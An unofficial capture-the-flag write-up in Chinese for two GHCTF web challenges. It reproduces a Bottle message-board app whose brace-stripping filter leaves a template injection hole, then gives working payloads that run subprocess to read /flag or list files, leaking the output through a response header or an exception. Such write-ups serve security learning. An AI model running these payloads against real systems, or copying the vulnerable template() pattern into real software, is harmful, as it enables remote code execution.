ctf-WEB: 关于 GHCTF Message in a Bottle plus 与 Message in a Bottle 的非官方wp解法

Message in a Bottle

from bottle import Bottle, request, template, runapp = Bottle()# 存储留言的列表
messages = []
def handle_message(message):message_items = "".join([f"""<div class="message-card"><div class="message-content">{msg}</div><small class="message-time">#{idx + 1} - 刚刚</small></div>""" for idx, msg in enumerate(message)])board = f"""<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>简约留言板</title><link href="https://cdn.bootcdn.net/ajax/libs/twitter-bootstrap/5.1.3/css/bootstrap.min.css" rel="stylesheet"><style>:root {{--primary-color: #4a90e2;--hover-color: #357abd;--background-color: #f8f9fa;--card-background: #ffffff;--shadow-color: rgba(0, 0, 0, 0.1);}}body {{background: var(--background-color);min-height: 100vh;padding: 2rem 0;font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;}}.container {{max-width: 800px;background: var(--card-background);border-radius: 15px;box-shadow: 0 4px 6px var(--shadow-color);padding: 2rem;margin-top: 2rem;animation: fadeIn 0.5s ease-in-out;}}@keyframes fadeIn {{from {{ opacity: 0; transform: translateY(20px); }}to {{ opacity: 1; transform: translateY(0); }}}}.message-card {{background: var(--card-background);border-radius: 10px;padding: 1.5rem;margin: 1rem 0;transition: all 0.3s ease;border-left: 4px solid var(--primary-color);box-shadow: 0 2px 4px var(--shadow-color);}}.message-card:hover {{transform: translateX(10px);box-shadow: 0 4px 8px var(--shadow-color);}}.message-content {{font-size: 1.1rem;color: #333;line-height: 1.6;margin-bottom: 0.5rem;}}.message-time {{color: #6c757d;font-size: 0.9rem;display: block;margin-top: 0.5rem;}}textarea {{width: 100%;height: 120px;padding: 1rem;border: 2px solid #e9ecef;border-radius: 10px;resize: vertical;font-size: 1rem;transition: border-color 0.3s ease;}}textarea:focus {{border-color: var(--primary-color);outline: none;box-shadow: 0 0 0 3px rgba(74, 144, 226, 0.1);}}.btn-custom {{background: var(--primary-color);color: white;padding: 0.8rem 2rem;border-radius: 10px;border: none;transition: all 0.3s ease;font-weight: 500;text-transform: uppercase;letter-spacing: 0.05rem;}}.btn-custom:hover {{background: var(--hover-color);transform: translateY(-2px);box-shadow: 0 4px 8px var(--shadow-color);}}h1 {{color: var(--primary-color);text-align: center;margin-bottom: 2rem;font-weight: 600;font-size: 2.5rem;text-shadow: 2px 2px 4px var(--shadow-color);}}.btn-danger {{transition: all 0.3s ease;padding: 0.6rem 1.5rem;border-radius: 10px;text-transform: uppercase;letter-spacing: 0.05rem;}}.btn-danger:hover {{transform: translateY(-2px);box-shadow: 0 4px 8px var(--shadow-color);}}.text-muted {{font-style: italic;color: #6c757d !important;}}@media (max-width: 576px) {{h1 {{font-size: 2rem;}}.container {{padding: 1.5rem;}}.message-card {{padding: 1rem;}}}}</style></head><body><div class="container"><div class="d-flex justify-content-between align-items-center mb-4"><h1 class="mb-0">📝 简约留言板</h1><a href="/Clean" class="btn btn-danger"onclick="return confirm('确定要清空所有留言吗？此操作不可恢复！')">🗑️ 一键清理</a></div><form action="/submit" method="post"><textarea name="message" placeholder="输入payload暴打出题人"required></textarea><div class="d-grid gap-2"><button type="submit" class="btn-custom">发布留言</button></div></form><div class="message-list mt-4"><div class="d-flex justify-content-between align-items-center mb-3"><h4 class="mb-0">最新留言（{len(message)}条）</h4>{f'<small class="text-muted">点击右侧清理按钮可清空列表</small>' if message else ''}</div>{message_items}</div></div></body></html>"""print(board)return boarddef waf(message):return message.replace("{", "").replace("}", "")@app.route('/')
def index():return template(handle_message(messages))@app.route('/Clean')
def Clean():global messagesmessages = []return '<script>window.location.href="/"</script>'@app.route('/submit', method='POST')
def submit():message = waf(request.forms.get('message'))messages.append(message)return template(handle_message(messages))if __name__ == '__main__':run(app, host='localhost', port=9000)

模板注入，查看官方文档得知

模板引擎允许您在模板中嵌入python代码的行或块。代码行以开头 % 代码块被 <% 和 %> 令牌：

% name = "Bob"  # a line of python code
<p>Some plain text in between</p>
<%# A block of python codename = name.title().strip()
%>
<p>More plain text</p>

直接控制一个返回头,注意一定要有回车

<%
result = __import__('subprocess').run(['cat','/flag'], capture_output=True
)
encoded = __import__('base64').b64encode(result.stdout).decode()
__import__('bottle').response.headers['X-Output'] = encoded
%>

Message in a Bottle plus

发送尝试单个引号报错,双个不报错,只要把字符放在注释内就不报错,猜测waf为类似

a = input()
eval(waf = a)
template(a)

使用三引号绕过waf,报错带出回显

"""
that_runing
% out=__import__('urllib').parse.quote(__import__('subprocess').run(['ls'],capture_output=True).stdout);raise Exception(out)
"""